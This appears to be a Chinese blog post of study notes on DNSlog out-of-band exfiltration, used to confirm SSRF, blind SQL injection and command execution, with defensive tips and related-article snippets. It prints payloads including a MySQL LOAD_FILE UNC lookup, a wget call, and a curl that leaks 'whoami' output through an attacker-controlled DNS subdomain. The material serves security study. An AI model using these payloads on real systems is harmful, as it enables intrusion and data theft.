Web漏洞知识梳理笔记--DNSlog数据外带

最新推荐文章于 2025-04-02 13:05:07 发布
最新推荐文章于 2025-04-02 13:05:07 发布
阅读量1.4k 收藏 12
点赞数 8
文章标签: 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47742555/article/details/144697735
版权

        DNSlog数据外带是一种常见的攻击者在渗透测试或攻击中使用的技术,用于检测目标系统是否存在 SSRF(服务器端请求伪造)、命令注入、盲目SQL注入等漏洞。通过这种技术,攻击者可以利用 DNS 解析查询(通过域名访问)来检测远程服务器是否访问了特定的外部资源。利用 DNSlog 服务,可以将目标服务器的 DNS 请求(外带数据)捕获到一个受控的 DNS 服务器上,从而实现数据外带和确认漏洞的存在。

工作原理

  1. DNSlog 服务:攻击者首先注册或设置一个受控的 DNSlog 服务,它会记录所有向该域名的 DNS 查询请求。常见的 DNSlog 服务有 ceye.iodnslog.cn 等。

  2. 构造请求:攻击者在漏洞测试中,构造一个恶意的 HTTP 请求或其他输入,输入的数据包含一个独特的 DNS 记录(比如 abc123.dnslog.com)。

  3. DNS 请求触发:当目标服务器执行了该恶意请求时,服务器会尝试访问指定的 DNSlog 域名。

  4. 记录请求:DNSlog 服务会记录下从目标服务器发出的 DNS 查询请求,攻击者从 DNSlog 中获取请求信息,验证服务器是否进行了外部 DNS 查询,并可以从请求中提取特定数据。

DNSlog数据外带的常见场景

  1. SSRF(服务器端请求伪造)

    • 利用 SSRF,攻击者构造请求让服务器访问 DNSlog 记录的域名,通过观察是否有 DNS 查询来确认漏洞。

    • 示例:

      http://victim.com/?url=http://abc123.dnslog.com

  2. 盲注(SQL注入、命令注入等)

    • 在盲注的情况下,响应没有明显的反馈,攻击者可以通过包含 DNS 查询来确认是否执行了注入。

    • 示例:

      SELECT LOAD_FILE('\\\\abc123.dnslog.com\\file.txt');

  3. 远程代码执行(RCE)

    • 在存在远程代码执行漏洞的情况下,攻击者可以构造一个请求,让服务器访问 DNSlog 域名,以验证代码执行成功。

    • 示例:

      wget http://abc123.dnslog.com

DNSlog数据外带的条件

  1. Windows系统;
  2. secure_file_priv为空;
  3. ROOT权限.

步骤举例

假设你在测试一个存在 SSRF 漏洞的网站,并希望通过 DNSlog 检测数据外带。

  1. 获取 DNSlog 域名

    • 注册或使用 DNSlog 服务(如 ceye.io),获取你专属的 DNS 域名(如 yourdomain.ceye.io)。

  2. 构造恶意请求

    • 将目标服务可能的 SSRF 漏洞点替换为你的 DNSlog 域名。

      http://victim.com/?url=http://yourdomain.ceye.io

  3. 观察 DNSlog 响应

    • 在 DNSlog 服务后台,查看是否有来自目标服务器的 DNS 查询记录。如果有,说明目标服务器成功执行了请求,漏洞得以验证。

    • 查询示例:

      2024-12-20 12:30:45 | abc123.yourdomain.ceye.io | 192.168.0.1

  4. 数据外带

    • 在更多场景中,攻击者可能将敏感数据嵌入到 DNS 查询中。例如,将服务器的环境变量、文件内容等数据通过 DNS 请求进行外带。

      curl http://`whoami`.yourdomain.ceye.io

      当攻击者访问 DNSlog 时,结果可能显示如下:

      2024-12-20 12:35:45 | root.yourdomain.ceye.io | 192.168.0.1

注意事项

  • 域名长度限制:DNS查询有长度限制,通常不超过255个字符,因此在进行数据外带时,确保要外带的数据不会超过限制。

  • 协议限制:DNSlog技术主要适用于支持DNS解析的协议(如 HTTP、FTP、SMTP 等)。某些协议可能不触发 DNS 请求。

  • 防护措施

    • 禁止内部网络访问:通过防火墙规则,阻止服务器对外访问内部 IP 地址或外部的 DNS 服务。

    • 限制 DNS 查询:防止服务器查询外部不受信任的域名,或者对 DNS 查询进行监控。

    • 输入验证与过滤:对用户输入进行严格的验证和过滤,避免存在 SSRF 等漏洞的输入被利用。

总结

        DNSlog 数据外带技术利用了服务器发出的 DNS 请求来确认漏洞的存在和执行结果。通过利用 DNSlog 服务,攻击者可以有效检测 SSRF、盲注、RCE 等漏洞,并可能外带一些敏感数据。为了防范此类攻击,需要对外部请求进行严格限制,并加强对服务器网络访问的监控与防护。

dnslog外带是什么
来而不往非礼也
05-14 1818
在看hw面经的时候发现了dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
V2022全栈培训笔记WEB攻防47-WEB攻防-通用漏洞&Java反序列化&EXP生成&数据提取&组件安全
zz12345600354的博客
06-12 1062
1、Java反序列化演示-原生API接☐2、Java反序列化漏洞利用-Ysoserial使用3、Java反序列化漏洞发现利用点-函数&数据4、Java反序列化考点-真实&CTF赛题-审计分析#内容点:1、明白Java反序列化原理2、判断Java反序列化漏洞3、学会-Ysoserial_工具使用4、学会-SerializationDumper5、了解-简要Java代码审计分析#前置知识序列化和反序列化的概念:序列化:把Java对象转换为字节序列的过程。
SQL注入--DNSlog外带注入--理论
m0_56019217的博客
11-23 1033
DNS的作用是将域名解析为IP而DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问信息。可以理解为DNS服务器上的日志文件。比如,以点为分隔,从右向左依次是顶级域名、二级域名、三级域名。即,net是顶级域名,csdn是二级域名,blog是三级域名。域名不区分大小写。在进行ping命令时会使用DNS解析:这里就是被解析后,与csdn.com进行了拼接,然后再去执行Ping命令。这里我们界面就回显得到了,也就是得到了的值。这个过程就可以被称为DNSlog外带
安全测试的辅助工具之DNSLog 平台
西京刀客
03-27 491
DNSLog 是一种用于安全测试的辅助工具,主要用于检测 无回显漏洞(如 SSRF、Blind SQLi、XXE 等)。它的核心原理是通过 DNS 协议记录目标服务器发起的 DNS 查询请求,从而间接验证漏洞的存在。
DNSlog外带
adaosanqian的博客
02-28 7745
减轻盲注的复杂操作,运用DNSlog外带来进行操作
【技巧】DNSlog外带文件
qinjilll的博客
08-23 2768
我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名等的访问信息,类似日志文件。我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功。
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 3074
创新蓝队-针对DNSlog数据外带攻击的应急与预防
SQL注入之DNSLog外带注入
dragon的博客
02-21 3346
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
No. 31 笔记 | Web安全-SQL手工注入技术学习 Part 2
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
01-13 1257
总结本文全面梳理了SQL注入技术,涵盖MySQL、Access、MSSQL和Oracle的常见注入方法。提供了大量实战案例,展示了如何手工执行注入攻击并绕过安全防护。反思防御措施需要多层次部署,单一防护手段难以完全防范。检测和防御技术需要结合AI和自动化工具进一步提升效率。建议开发过程中严格执行输入验证和参数化查询。定期进行安全测试和漏洞扫描。
[网络安全]XSS之Cookie外带攻击姿势详析
Hacker_LaoYi的博客
02-13 989
给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)网络安全产业就像一个江湖,各色人等聚集。
利用DNSlog外带数据注入
qq_68163788的博客
02-12 1139
在SQL注入中,利用DNSlog外带数据是一种有效的技术,特别是在面对盲注时。DNSlog平台,如CEYE和Burpsuite专业版,允许用户生成域名并记录访问情况。通过将特定数据嵌入DNS请求中,攻击者可以获取敏感信息。 在SQL注入的场景下,特别是当secure_file_priv值为空时,可以使用LOAD_FILE和INTO OUTFILE语句导出数据。以靶场测试为例,攻击者可以通过时间盲注的方法逐步推测数据库的名称。通过发送特定的SQL语句,结合SLEEP函数,攻击者可以判断出数据库名的字符。
DNS数据外带
最新发布
2301_78866120的博客
04-02 939
DNS数据外带
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1588
盲注代替 DNS log即DNS日志,域名解析的记录。
sqlmap+dnslog外带数据
m0_52813136的博客
08-04 447
sqlmap dnslog
【DNS外带
==
03-01 927
DNS_LOG外带 DNSLOG.cn (实际情况中你发现渗透的时候,有布尔型注入,但是很花时间,你有什么别的方法能够加快时间- 解决办法DNS_LOG外带) 普通DNS外带 http://dnslog.cn/ select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc')) 通过16进制编码DNS外带 select load_file(concat('\\\\',(select substr..
DNSlog外带原理及注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
sqlmap + dnslog外带数据
CYLK1987310466的博客
08-06 1163
sqlmap dnslog外带数据
dns外带数据【渗透测试】
热门推荐
leeezp的博客
09-09 32万+
上一篇文章我们已经介绍了搭建自己的dns log server 方法,接下来我将介绍如何通过dns query外带数据。下文中介绍的方法均为根据本人经验原创的方法,网上应该算是首次公开。
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 1208
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
dnslog
03-13
### DNSLog的工作原理 DNSLog通过利用DNS查询机制来传递信息并记录请求。当目标系统执行恶意构造的数据时,会触发向攻击者控制的域名发起DNS查询。由于每次DNS查询都会被服务器记录下来,因此可以通过查看这些日志获取到目标系统的响应情况[^1]。 具体来说,在Web安全测试或者漏洞挖掘过程中,如果存在SQL盲注或其他类型的注入点无法直接返回数据给攻击者,则可以借助于外部通道如HTTP(S)、FTP等协议;而DNS作为最基础也是最常见的网络服务之一,几乎所有的防火墙都不会阻止其流量,所以成为了理想的带外通信手段[^3]。 为了使这种技术生效,通常需要满足以下几个前提条件: - 受害方能够解析指定子域名为IP地址; - 攻击者拥有一个可配置CNAME/PTR记录并且能接收任意形式(A/AAAA/MX...)询问的日志平台; - 测试环境允许内部主机向外发送未经严格审查过滤过的DNS包。 一旦上述要求得到满足,就可以精心设计输入字符串使得程序尝试加载来自特殊URL的内容——该链接指向由黑客掌控下的权威名称服务器所管理的一个随机生成但独一无二的新二级甚至多级子节点,并最终完成整个过程的信息泄露操作[^2]。 ### 实现方式 以下是基于Python脚本创建简单的DNSLog客户端和服务端的例子: #### 客户端代码 (模拟受害者) ```python import socket def send_dns_query(domain_name, server_ip='8.8.8.8'): try: resolver = socket.gethostbyname_ex(domain_name)[2][0] print(f"Resolved {domain_name} to IP address: {resolver}") except Exception as e: print(e) if __name__ == "__main__": # 这里应该是一个受控环境下唯一且未注册过的子域名 unique_subdomain = "example.unique-subdomain.dnslog-server.com" send_dns_query(unique_subdomain) ``` 此部分代表可能存在于易受攻击应用程序内的逻辑错误或功能缺陷之处,它试图解析一个不存在但实际上是由攻击者事先准备好的完全限定域名(FQDN),从而间接通知后者有关成功触发漏洞的消息。 #### 服务端代码片段(用于捕捉和展示接收到的查询) 对于实际部署而言,建议采用成熟的开源项目比如`dnschef`或是商业解决方案而非自行编写简易版本,因为这涉及到复杂的事件处理循环以及高效的并发支持等问题超出了本文讨论范围[^4]. ```bash # 使用Dnsmasq设置本地DNS服务器监听所有类型请求并将它们重定向至自定义API接口保存起来供后续分析使用 dnsmasq --address=/#/127.0.0.1 --port=53 \ --dhcp-authoritative \ --log-facility=- \ --conf-file="" \ --server=/unique-subdomain.dnslog-server.com/#<Your API Endpoint Here> ``` 以上命令行参数组合指示了一个轻量级却十分灵活的小工具如何充当临时性的公共根目录代理角色,负责捕获任何发往`.dnslog-server.com.`下各级分支结构体成员对象的一切合法有效的查找活动。 ### 应用场景 除了辅助发现潜在的安全隐患之外,DNSLog还广泛应用于其他领域: - **社会工程学钓鱼邮件验证**:确认伪造链接是否已被点击打开过。 - **恶意软件行为监控**:跟踪样本运行期间产生的异常外部连接企图。 - **红队演练对抗训练**:评估防御体系对外部威胁感知能力的有效性和及时性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值